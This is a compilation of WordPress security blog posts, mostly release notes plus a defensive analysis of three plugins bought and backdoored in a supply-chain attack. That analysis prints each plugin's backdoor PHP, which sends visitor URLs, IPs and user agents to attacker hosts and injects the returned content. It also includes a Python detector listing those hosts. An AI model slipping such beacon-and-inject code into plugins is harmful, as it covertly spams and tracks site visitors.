Introducing Wordfence 7

Wordfence is the most popular WordPress security software in the world for good reason. The protection offered by the endpoint firewall outperforms alternatives. The scanner delivers the best detection in the industry. A long list of other features like country blocking, two-factor authentication and password auditing make Wordfence the best and most comprehensive security solution available for WordPress.

From the beginning, our development efforts have always focused on function over form. Having rapidly innovated for so many years, the resulting software does an extraordinary job of protecting WordPress websites, but it is also quite complex. Last summer we decided it was time to make a major investment in the user experience, making Wordfence not only the best security software available, but also intuitive and incredibly easy to use.

For the last 6 months we have been hard at work rebuilding the Wordfence user interface from the ground up. Today’s release of Wordfence 7 revolutionizes WordPress security by making a deep and complex product easier and more intuitive to use. We think Wordfence 7 is amazing, and we know you will, too.


Overview of Changes in Wordfence 7

Our goal with Wordfence 7 was simple: make Wordfence intuitive and easy to use for all users.

It needed to be easy for the novice to understand and configure without taking away any functionality from more advanced users.

To achieve that, we made the following high-level changes:

  • Updated our design framework to use modern interface standards
  • Focused more on the core Wordfence security features, like firewall and scan, and less on everything else
  • Eliminated the ‘Options’ page and added options sections for each feature
  • Added feature status indicators for core features
  • Added a help page with links to documentation and support options

Design Framework

Based on current UI/UX patterns and trends, we’ve built a framework using standard interface and experience approaches. The dashboard and feature pages provide configuration status, alerts and reporting. Detailed configuration screens are easily accessible with relevant links throughout the experience. Status summaries are interactive, guiding the user directly to the security hardening opportunities and giving you real-time information on the impact of any changes you make. The resulting software is more discoverable, approachable and user-friendly.

Feature Status Circles

One of our objectives with Wordfence 7 is to provide security hardening opportunities to users in a simple, intuitive way. With that in mind, we are introducing status circles. They provide a clear status summary for each feature. By hovering over the status circle, you will trigger a popover detailing the list of things you can do to improve the percentage shown. All popovers include a link to detailed documentation.

We also include status circles on the scan and firewall options pages, giving you immediate feedback as you improve your security posture.

Here’s an example of the status circles on the new scan page in action:

Simplified Dashboard

The new version of the dashboard is similar to the one we added in Wordfence 6, but is now less busy and even more useful. We added feature status sections for the firewall, scan and Wordfence Premium. You’ll still find notifications here, primarily based on scan results. Global options for the plugin are now accessible via the link on this page (more on our options page approach later).

Finally, we removed most of the charts from this page, leaving just a high-level Firewall Summary and a chart of attacks across the Wordfence network.

Simplified Navigation

We reduced the number of navigation options from 8 to 6. The two most important features, firewall and scan, are still available in the main navigation. Blocking is now accessible in the Firewall section and Live Traffic has been moved to Tools. Links for both features can be added back to the main navigation via their respective options, for those of you who prefer it.

The Options page has been removed completely in favor of a new approach.

New Options Sections

Prior to Wordfence 7, the majority of the Wordfence configuration options were on a single page. While there are some advantages to that approach, we found that it caused a majority of our users to never discover many useful features and options.

With Wordfence 7, you will now find an options link on all major feature pages. Global options are now accessible via a link on the Dashboard page. All options links can be found next to a gray gear icon.

Help Page

We know that security is a complex topic, and that configuring Wordfence can be challenging for less technical users, especially with some of the more exotic hosting configurations we sometimes come across. In an effort to make it easier to find the documentation or support you need, we added a Help page to the plugin. It includes links to our documentation organized by feature, along with links to our most popular help articles. Links to our free and Premium support options are also available, and you will find links to the new help section throughout the plugin.

Alongside this project, we also completely revamped our documentation for the product. Our old documentation will still be available for a while, but we will no longer be updating it going forward.

New Firewall Interface

The firewall interface has changed significantly. The main firewall page now includes four status circles, providing a broad overview of your site’s configuration status at the top. All firewall-related options are now accessible via the options link on this page. All firewall-related reporting is now available here as well.

Blocking and Rate Limiting are also now available via links on this page.

New Scan Interface

We’re really excited about the new scan interface. It’s exceptionally functional, very usable, and beautiful at the same time. At the top you’ll find status circles, summarizing your current configuration status. Below that, you will find the “Start new scan” button, along with links to Help and Options.

The Scan Options area is now where you set up scheduled scans. We removed the Scan Summary section and replaced it with a new status summary bar, displaying what the scanner is working on. The Scan Detailed Activity is now hidden by default, but you can reveal it by clicking the “show log” link above the results table.

The scan findings table has been revamped to show a summary view of each finding by default. You can view the details of the finding, and take action on it, by clicking the “Details” icon.

We also added statistics to the top of the table showing a summary of what the scanner found the last time it ran.

Other Updates

The Blocking interface has been completely redesigned. IP, Country and Custom Pattern blocking features have all been combined, and block count reporting is now available for each blocking rule you create. You can now manage and monitor the effectiveness of blocking rules in one place.

The Diagnostics page has been completely redesigned. All diagnostics sections are now collapsible, and collapsed by default, to make it easier to find what you’re looking for.

We replaced the product tour with a new guide that runs as you access each area of the plugin. We will be leveraging this new capability when we roll out new features that require more in-depth explanations, including the launch of Wordfence 7.

Live Traffic has been completely redesigned. The traffic table now shows summary data for each observation. You can view more detailed information by clicking the “View” icon. Viewing whois information and seeing recent traffic is now presented in a beautiful popover.

Wordfence has always included a great comment spam filter. Unfortunately, it was buried in the Options page, split into two different sections. In Wordfence 7, it now has its own page in the Tools section, which now includes basic reporting.

Thank You

It took us many months to get this right, and many people contributed to making this release happen. A big thank you to the hundreds of beta testers who helped us over the last couple of weeks. Your feedback has been invaluable.

With today’s release, we are excited to bring Wordfence 7 to the global Wordfence user community!

If you do find an issue, please submit tickets via Premium support or the forums so we can get them fixed. And as always, we welcome your comments here.

The post Introducing Wordfence 7 appeared first on Wordfence.

WP Cerber Security 6.0

New features

Hacker attacks on websites keep getting stronger and smarter, because fast-growing technologies create new opportunities for hackers and cybercriminals. We cannot ignore those facts, and that’s the reason we’ve implemented a new feature: Traffic Inspector. It is a specialized request inspection algorithm that acts as an additional protection layer. Since v6.0, WP Cerber Security inspects all suspicious requests and blocks them before they can harm a website. This security algorithm is enabled by default and requires no configuration. We will be constantly improving it based on the knowledge we gain from collecting and analyzing hacker attack patterns in our Cerber Lab.

Traffic Inspector not only inspects requests but also optionally logs them, so you can review them manually. Can the logging slow down website performance? It might on a free hosting plan, if logging of all traffic is enabled, ignoring search engine crawlers is disabled and saving of request fields is enabled.

Improvements

  • Added the ability to clean up Cerber’s DB tables. You can now manually delete all rows in a Cerber DB table on the Tools / Diagnostic admin page. Note: this operation cannot be rolled back.
  • If your hosting environment (web server) has issues that can affect plugin functionality, they are shown on the Tools / Diagnostic page.
  • On the Access Lists admin page there are new links for each entry to check HTTP requests from a particular network or IP address.
  • Added protection to prevent scheduled tasks from being executed multiple times an hour. If you occasionally receive several identical weekly reports, this is the fix for that.

Updates

  • Language translations have been updated. Thanks to all translators!
  • JavaScript code is improved to eliminate excessive fields in GET requests.
  • Code performance optimizations.

Bugs fixed

  • To eliminate possible warning messages in the server error log or the WordPress dashboard, the inet_pton() function has been replaced with filter_var().

SQLi Vulnerability in YITH WooCommerce Wishlist


As part of our regular research audits for our Sucuri Firewall, we discovered an SQL Injection vulnerability affecting the YITH WooCommerce Wishlist plugin for WordPress. This plugin allows visitors and potential customers to make wish lists containing products in the WooCommerce store, and is currently installed on 500,000+ websites.

Are You at Risk?

This vulnerability is caused by the lack of sanitization of user-provided data in versions below 2.2.0.

Continue reading SQLi Vulnerability in YITH WooCommerce Wishlist at Sucuri Blog.

WordPress Supply Chain Attacks: An Emerging Threat

In the last few months, we have discovered a number of supply chain attacks targeting WordPress plugins. In this post, we explain what a supply chain attack is, why WordPress is an attractive target for them, and what you can do to protect your site.

What Is a Supply Chain Attack?

In the software industry, a supply chain attack exploits a trusted relationship between software vendors or authors and their customers. For WordPress, that means figuring out how to embed malware into software updates. In one case, we saw an existing plugin author install malware on customer sites in an effort to monetize an existing plugin. In every other case we have uncovered, the attack was carried out by someone who had purchased the plugin with the express intention of attacking its users.

Here are the WordPress supply chain attacks we have recently uncovered:

These attacks work because, as a site owner, you have already made the decision to trust the software vendor or author. In many cases, you may have gone so far as to enable automatic updates for the plugin, allowing the author turned attacker to push malware to your website any time they want.

Why Is WordPress a Target?

WordPress is an attractive target for supply chain attacks for a number of reasons.

The first reason is simply scale. According to w3techs, WordPress powers 29.2% of all websites – a massive user base to go after. In addition, at the time of this writing there were 53,566 plugins available for download in the official WordPress.org plugin repository. That is a lot to work with on both fronts.

Secondly, the WordPress.org plugin directory is an open, community-driven resource. According to the plugin guidelines page, “It is the sole responsibility of plugin developers to ensure all files within their plugins comply with the guidelines.” This means that while there is a small team tasked with managing the plugin repository and another small team focused on security, ultimately users rely on plugin developers to keep them safe.

Thirdly, most WordPress sites are managed pretty casually. Making a change to a website at a larger company might include code review, testing and a formal change control process. But that’s probably not happening consistently, if at all, on most smaller websites. In addition, many site owners don’t monitor their WordPress sites closely, which means malware can often remain in place for many months without being discovered.

Lastly, the WordPress plugin repository has a huge number of abandoned plugins. When we looked back in May, almost half of the available plugins hadn’t been updated in over two years. This represents a great opportunity for ne’er-do-wells looking to con unsuspecting plugin authors into selling something they created years ago and have moved on from.

Why Do WordPress Plugin Authors Sell Their Plugins?

The large majority of plugins in the repository are completely free to use, meaning there aren’t any premium features available for purchase. While that is generally a very positive thing for the WordPress community, the reality is that all the people behind those free plugins still need to make a living. If they aren’t making money from the plugin they created, they often lose interest in it or abandon it altogether.

When someone approaches them offering money for their plugin, it may be hard to pass up. And the plugin author may think it’s a perfectly innocent offer, because it’s not like the supply chain attacker announced their bad intentions. On the contrary: in the purchase solicitations we have seen, they often come across as someone wanting to help.

This is an excerpt from a solicitation to purchase a plugin that we saw earlier in 2017:

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

As a plugin author who created something that thousands of people are using, what a wonderful opportunity! This nice person is offering to not only pick up where you left off with something you cared enough to build, but they’re willing to give you money for it as well.

How to Protect Your Websites

Fortunately, you can protect your website against these attacks with a number of effective tactics.

  1. Screen plugins and themes very carefully. Every time you install a plugin or theme, you are allowing a new person’s code to run on your site. In general, the more established and active the author, the better.
  2. Scan your site for malware regularly. We recommend enabling scheduled scans by both Wordfence and Gravityscan. Both include a free scheduled scan option.
  3. Check your site and IP address against blacklists regularly. Gravityscan checks over 20 of them for free.
  4. Exercise great caution when the WordPress.org repository removes or “closes” one of your installed plugins, or when it changes hands. Wordfence alerts you when a plugin has been removed from the repo for any reason.
  5. Consider removing or replacing abandoned plugins. Authors of these plugins are the most likely to sell them. Wordfence alerts you when a plugin hasn’t been updated in 2 years.
  6. Keep an eye on our blog. We will continue to share information about plugins that have been compromised as we discover them in our research.
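The six steps above amount to a policy a site owner can apply to an inventory of installed plugins. The following Python script is an added example (it is not Wordfence or Gravityscan code and does not use their APIs) that implements the checks a script can make offline: it flags plugins the repository has closed, plugins not updated in two years, and automatic updates left enabled on such a plugin. The inventory records, their field names, the slugs and the dates are all constructed for this example and are an assumption, not the WordPress.org API schema.

```python
from datetime import date, datetime

# Two-year threshold, the same one the post uses for "abandoned".
ABANDONED_AFTER_DAYS = 2 * 365

# Reference date for the audit, fixed so the example is reproducible (constructed).
AUDIT_DATE = date(2017, 12, 27)

# Constructed inventory records. Slugs and dates are invented; the field names are
# an assumption for this script, not the shape of any real API response.
INVENTORY = [
    {"slug": "constructed-plugin-a", "last_updated": "2015-06-01", "closed": False, "auto_update": True},
    {"slug": "constructed-plugin-b", "last_updated": "2017-11-02", "closed": True, "auto_update": False},
    {"slug": "constructed-plugin-c", "last_updated": "2017-12-01", "closed": False, "auto_update": True},
]


def days_since_update(record, today):
    """Days between the plugin's last repository update and the audit date."""
    last = datetime.strptime(record["last_updated"], "%Y-%m-%d").date()
    return (today - last).days


def audit_plugin(record, today):
    """Return the sorted list of policy flags raised for one plugin."""
    flags = []
    # Step 4: a closed plugin will never receive a fix through the repository.
    if record["closed"]:
        flags.append("closed_on_wordpress_org")
    # Step 5: plugins untouched for two years are the likeliest to be sold.
    if days_since_update(record, today) > ABANDONED_AFTER_DAYS:
        flags.append("abandoned")
        # Auto-update on such a plugin lets a new owner push code unattended.
        if record["auto_update"]:
            flags.append("auto_update_on_abandoned_plugin")
    return sorted(flags)


def audit_inventory(records, today):
    """Map each flagged plugin slug to its flags; clean plugins are omitted."""
    report = {}
    for record in records:
        flags = audit_plugin(record, today)
        if flags:
            report[record["slug"]] = flags
    return report


if __name__ == "__main__":
    for slug, flags in audit_inventory(INVENTORY, AUDIT_DATE).items():
        print(f"{slug}: {', '.join(flags)}")
```

Run against real data, the inventory would be filled from the site's installed plugin list and the repository's last-update information; the decision logic stays the same.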

Conclusion

Unfortunately, we believe that these types of attacks on the WordPress ecosystem are going to grow in popularity. Attackers will also very likely employ new and creative tactics that we can’t foresee in the new year.

As a site owner, you will need to apply extra scrutiny to every plugin and theme you add to your website, and keep your eyes open for anything odd that crops up, in order to stay vigilant against such attacks in the future.

The post WordPress Supply Chain Attacks: An Emerging Threat appeared first on Wordfence.

Wordfence Now Includes 1.4 Billion Leaked Passwords in Password Auditing Feature

Last week, we reported a massive upsurge in brute force login attempts following the leak of a database of 1.4 billion clear text credentials. No one had seen 14% of the exposed username/password pairs before, making this a ripe opportunity for hackers to attempt to break into WordPress sites.

Historically, brute force attacks targeting WordPress have not been very successful. But this new database provides fresh credentials that, when matched with a WordPress username, may provide a higher success rate for attackers targeting sites that do not have any protection.

Password Auditing Improvements

Wordfence Premium includes a powerful Password Auditing feature. Using a GPU cracking cluster, we give you the ability to audit the strength of your admin and user passwords. You can learn more about how this feature helps protect your site here.

In response to this latest leak, we’ve merged this updated password list into our own large password list that we currently use to audit administrator accounts. Our previous list contained 269 million known passwords from various breaches, such as LinkedIn and eHarmony. After merging and removing duplicates, this new list comes in at 609 million known passwords against which we can test your users’ passwords.

We ran some initial tests to compare how our previous list performed against the new list. In a random sampling of 100 user accounts, our previous list cracked 42% of the 100 password hashes. The current list cracks 57% when run against the same sample. That’s a 36% increase over the previous capability. This means that a Wordfence password audit is now 36% more likely to find a weak password than before.

Recommendations

We strongly recommend that you upgrade to Wordfence Premium to benefit from the new capability we’ve added to our Password Auditing feature.

We also recommend you follow these additional steps:

  1. Install a firewall like Wordfence that intelligently blocks brute force attacks.
  2. Ensure that you have strong passwords on all user accounts, especially admin. Wordfence provides an option to enforce strong passwords when creating/updating a user account under “Login Security Options”.
  3. Change your admin username from the default ‘admin’ to something harder to guess.
  4. Delete any unused accounts, especially admin accounts that you don’t use. This reduces your attack surface.
  5. Enable two-factor authentication on all admin accounts. Wordfence Premium provides two-factor authentication.
  6. Enable an IP blacklist to block IPs that are engaged in this attack. Wordfence Premium provides a real-time IP blacklist.
  7. Monitor login attempts by configuring alerts for when an admin signs in to your website. Wordfence (free version) provides this.
  8. Do not reuse a password on multiple services. That way, if you have a password from a data breach in this new database, it won’t be the same as your WordPress admin password. You can use a password manager like 1Password to manage many passwords across services.

The post Wordfence Now Includes 1.4 Billion Leaked Passwords in Password Auditing Feature appeared first on Wordfence.

Three Plugins Backdoored in Supply Chain Attack

In the last two weeks, the WordPress.org repository has closed three plugins because they contained content-injection backdoors. “Closing” a plugin means that it is no longer available for download from the repository, and will not show up in WordPress.org search results. Each of them had been purchased in the previous six months as part of the same supply chain attack, with the goal of injecting SEO spam into the sites running the plugins.

What We Know About the Plugins

Duplicate Page and Post

URL: https://wordpress.org/plugins/duplicate-page-and-post/
Active Installs: 50,000+
Current Owner: pluginsforwp (joined WordPress.org July 10, 2017)
Sold Date: August 2017
Removed from WordPress.org date: December 14, 2017

The original plugin author responded to our request for information on the sale of the plugin, confirming that they did indeed sell the plugin to a person named Daley Tias in the summer of 2017. However, we were unable to find any record of a person named Daley Tias online. The original plugin author has not shared the purchase solicitation message with us at the time of this writing.

The Backdoor Code
This content injection backdoor first appeared in version 4.2.1 (released 4 months ago):

// Beacon to the attacker's server, sending the visitor's URL, IP and user agent
$request_url = 'https://cloud-wp.org/api/v1/update?url=' . urlencode($url) . '&ip=' . urlencode($ip) . '&user_agent=' . urlencode($user_agent);
$response = wp_remote_get($request_url, array('timeout' => 2));

$this->data = new stdClass();
$this->data->content = null;
$this->data->confirm = null;
$this->data->contact = null;

// The server's JSON reply decides both what is injected and where
if (!$response instanceof WP_Error && $response['body']) {
	$data = json_decode($response['body']);
	if (null !== $data) {
		$content_position = $data->version; // '1', '2' or other: injection position
		if ('1' == $content_position) {
			$this->data->confirm = $data->data;
			if (!$output_buffer) {
				$this->data->content = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->content = $data->data;
		} else {
			$this->data->contact = $data->data;
		}
	}
}

The backdoor makes a request to cloud-wp.org, and the server returns content chosen according to the URL and user agent passed in the query string. This code runs on every request to the site, so it can be used to inject content for normal site visitors, web crawlers, or the site administrators. We’ve seen content injection in the past, and it’s typically used to inject cloaked backlinks, a form of SEO spam.

No Follow All External Links

URL: https://wordpress.org/plugins/nofollow-all-external-links/
Active Installs: 9,000+
Current Owner: gearpressstudio (joined WordPress.org March 17, 2017)
Sold Date: April 2017
Removed from WordPress.org date: December 19, 2017

The original plugin author shared the original purchase solicitation with us:

Hi [redacted] and team, I hope my email finds you well.

My name is Leon, I’m a facilitator who is given budgets by companies to acquire just about anything.

The client I have at the moment, is looking for a lucrative exchange with developers of modules / extensions, themes and plugins for Joomla, Drupal or WordPress.

My client is looking to purchase existing unsupported plugins which can be easily updated by his team, in order to boost their developer profile and online presence. I notice you have a number of great plugins and my client would be interested in a deal on either, or both of these for the right price:

https://en-gb.wordpress.org/plugins/google-analytics-track-outbound-links/
https://wordpress.org/plugins/nofollow-all-external-links/

Let me know whether this is of any interest to you.

Kind Regards,
Leon Goodman

There are a number of people named Leon Goodman online, but none seemed to match the profile of someone who would be interested in buying a WordPress plugin.

A company called Orb Online in West Sussex, UK made the payment for the plugin. A quick Google search leads us to their website: “Orb Online is a UK based digital marketing agency, specialising in SEO, eCommerce and Magento web development.”

The Backdoor Code
This content-injection backdoor first appeared in version 2.1.0 (released 8 months ago).

// Note the single '=' : the 'improvement' setting is assigned 1, not compared, so this branch always runs
if (self::$data['report'] && self::$advancedSettings['improvement'] = 1) {
	// Beacon to the attacker's server with the page URL, user agent and server IP
	$requestUrl = 'https://cloud.wpserve.org/api/v1/update?&url=' . urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&agent=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ip=' . urlencode($_SERVER['SERVER_ADDR']);
	$response = wp_remote_get($requestUrl, ['timeout' => 2]);
	if (!$response instanceof WP_Error) {
		self::$data['response'] = json_decode($response['body']);
	}
}

// The stored response is later injected into post content through this filter
add_filter('the_content', ['noFollowAllExternalLinks', 'interceptContent']);

As with Duplicate Page and Post, this backdoor makes a request to cloud.wpserve.org, and the server returns content chosen according to the URL and user agent passed in the query string. Content injection looks to be bound to a setting in the plugin called “Improvement scheme”, which is enabled by default. Disabling the setting doesn’t actually turn off the injection, since the code in the if statement is setting the value instead of comparing it to 1. The code verifies that the user agent matches a web crawler (like Googlebot), so it looks like this backdoor is used for SEO by injecting backlinks onto the page.

WP No External Links

URL: https://wordpress.org/plugins/wp-noexternallinks/
Active Installs: 30,000+
Current Owner: steamerdevelopment (joined WordPress.org June 29, 2017)
Sold Date: July 12, 2017
Removed from WordPress.org date: December 22, 2017 (we’re assuming this based on the date of the last update note, from a member of the WordPress.org plugins team)

The original plugin author was very helpful, providing the original purchase solicitation he received:

Hi Jehy, I hope my email finds you well.

My name is Daley, I’m a purchaser and I’m contacting you on behalf of my client.

My client is looking to purchase existing WordPress plugins, even unsupported ones, which can be easily updated by his team of developers in order to boost his developer profile and online presence.

They would be interested in purchasing any plugins you have developed, or currently own. In particular they may be interested in this one https://wordpress.org/plugins/wp-noexternallinks/

Let me know whether this is of any interest to you.

Kind Regards,
Daley Tias

This correspondence is very similar to the message that the author of the No Follow All External Links plugin received above. While the two messages do not match word for word, they appear very likely to be slight variations from the same template.

The same person (or alias), Daley Tias, purchased both the Duplicate Page and Post and WP No External Links plugins. Payment was received from Orb Online, with the contact email address info@orbonline.co.uk. This is also the same company that paid for the No Follow All External Links plugin.

The Backdoor Code
This content injection backdoor first appeared in version 4.2.1 (released 4 months ago).

if ($this->data->report) {
	// Beacon to the attacker's server with the page URL, IP and user agent
	$request_url = 'https://wpconnect.org/api/v1/update?&url=' . urlencode($this->data->url) . '&ip=' . urlencode($this->data->ip) . '&user_agent=' . urlencode($this->data->user_agent);
	$response = wp_remote_get($request_url, array('timeout' => 2));

	if (!$response instanceof WP_Error && $response['body']) {
		$data = json_decode($response['body']);
		$content_position = $data->version; // '1', '2' or other: injection position
		if ('1' == $content_position) {
			$this->data->buffer = $data->data;
			if ('all' !== $this->options->mask_links) {
				$this->data->before = $data->data;
			}
		} elseif ('2' == $content_position) {
			$this->data->before = $data->data;
		} else {
			$this->data->after = $data->data;
		}
	}
}

In the same manner as the previous two backdoors, this one makes a request to wpconnect.org and returns content based on the URL and user agent passed in the query string. The code verifies that the user agent matches a web crawler, so, again, it looks like this backdoor is used for SEO by injecting backlinks onto the page.

Wpconnect.org resolves to the same IP as cloud-wp.org, 52.14.28.183, the API endpoint used in the Duplicate Page and Post backdoor.
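All three backdoors on this page share one shape: a wp_remote_get() beacon to an attacker-controlled host carrying the visitor's URL and user agent, a JSON reply that is written into the page, and, in the No Follow All External Links case, an assignment used where a comparison was intended. The following Python script is an added example, not Wordfence's scanner nor any of the plugins' code, that turns those observations into a static check a site owner can run over plugin source files. The host and IP indicators are the ones named in the post; the allowlist of hosts a plugin may legitimately contact, the two constructed sample files and the regex heuristics are assumptions for this example.

```python
import re
from dataclasses import dataclass

# Indicators taken from the three backdoors described in the post.
KNOWN_C2_HOSTS = {"cloud-wp.org", "cloud.wpserve.org", "wpconnect.org"}
KNOWN_C2_IPS = {"52.14.28.183"}
# Hosts a plugin may contact without raising a finding (assumed allowlist; extend per site).
ALLOWED_HOSTS = {"wordpress.org", "api.wordpress.org", "downloads.wordpress.org"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# A lone '=' that is not part of ==, ===, !=, !==, <=, >= or =>.
SINGLE_ASSIGN_RE = re.compile(r"(?<![=!<>])=(?![=>])")


@dataclass(frozen=True)
class Finding:
    kind: str
    detail: str


def extract_hosts(php_source):
    """All distinct hosts named in http(s) URL literals, sorted."""
    return sorted(set(URL_RE.findall(php_source)))


def if_conditions(php_source):
    """Yield the text inside each `if (...)`, handling nested parentheses."""
    for m in re.finditer(r"\bif\s*\(", php_source):
        depth, i = 1, m.end()
        while i < len(php_source) and depth:
            c = php_source[i]
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            i += 1
        if depth == 0:
            yield php_source[m.end():i - 1]


def scan_plugin_source(php_source):
    """Heuristic findings for one PHP file: known C2 hosts, unlisted outbound
    requests, and assignments inside if-conditions (the '= 1' defect above)."""
    findings = []
    for host in extract_hosts(php_source):
        if host in KNOWN_C2_HOSTS or host in KNOWN_C2_IPS:
            findings.append(Finding("known_c2", host))
        elif host not in ALLOWED_HOSTS and "wp_remote_get(" in php_source:
            findings.append(Finding("unlisted_outbound", host))
    for cond in if_conditions(php_source):
        if SINGLE_ASSIGN_RE.search(cond):
            findings.append(Finding("assignment_in_condition", cond.strip()))
    return findings


# Constructed samples (not the real plugin files): one mimicking the backdoor
# pattern shown in the post, one benign.
SUSPICIOUS_SAMPLE = r"""<?php
if (self::$data['report'] && self::$advancedSettings['improvement'] = 1) {
    $requestUrl = 'https://cloud.wpserve.org/api/v1/update?&url=' . urlencode($_SERVER['REQUEST_URI']);
    $response = wp_remote_get($requestUrl, ['timeout' => 2]);
}
"""

BENIGN_SAMPLE = r"""<?php
if ('1' == $content_position && $enabled !== false) {
    $response = wp_remote_get('https://api.wordpress.org/plugins/info/1.2/', ['timeout' => 2]);
}
"""

if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, [(f.kind, f.detail) for f in scan_plugin_source(sample)])
```

The assignment check is deliberately a heuristic: PHP code sometimes assigns inside a condition on purpose, so treat that finding as something to read, while a hit on a known C2 host or an outbound request to a host that is not on the allowlist is what warrants removing the plugin and scanning the site.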

Conclusion and Recommendations

We know that someone with the name or alias Daley Tias purchased WP No External Links and Duplicate Page and Post. We also know that the backdoor code for both plugins calls an API endpoint hosted on the same IP. The same company, Orb Online, paid for both the No Follow All External Links and Duplicate Page and Post plugins. Additionally, the purchase solicitation for No Follow All External Links was written from the same template used to solicit the purchase of WP No External Links. All three plugins were purchased by a WordPress.org user that was created within a month of the purchase. Furthermore, the backdoor code used in all three plugins is very similar.

Based on this evidence, we are confident that the same criminal actor was responsible for purchasing and adding backdoors to all three of these plugins, with the goal of injecting SEO spam into the thousands of websites running the plugins. It is not too much of a stretch to assume that Orb Online has been leveraging injected spam links to boost search engine rankings for their customers.

Supply chain attacks targeting WordPress plugins are becoming more and more popular. Wordfence lets you know when a plugin has been removed from the WordPress.org repository. As a site owner, it is incredibly important to stay on top of these, and treat removed (or closed) plugins with an abundance of caution.

If you have any of these plugins running on your site, we recommend that you remove them immediately and that you make sure that SEO spam hasn’t been injected into your site. Even though one of them, WP No External Links, has been updated to remove the backdoor, it has been closed, so it will never be updated again in the future.

To check your site, we recommend running scans with both Wordfence and Gravityscan (with the Accelerator installed).

Finally, a big thanks to the original plugin authors who provided the critical information that allowed us to connect the dots.

The post Three Plugins Backdoored in Supply Chain Attack appeared first on Wordfence.
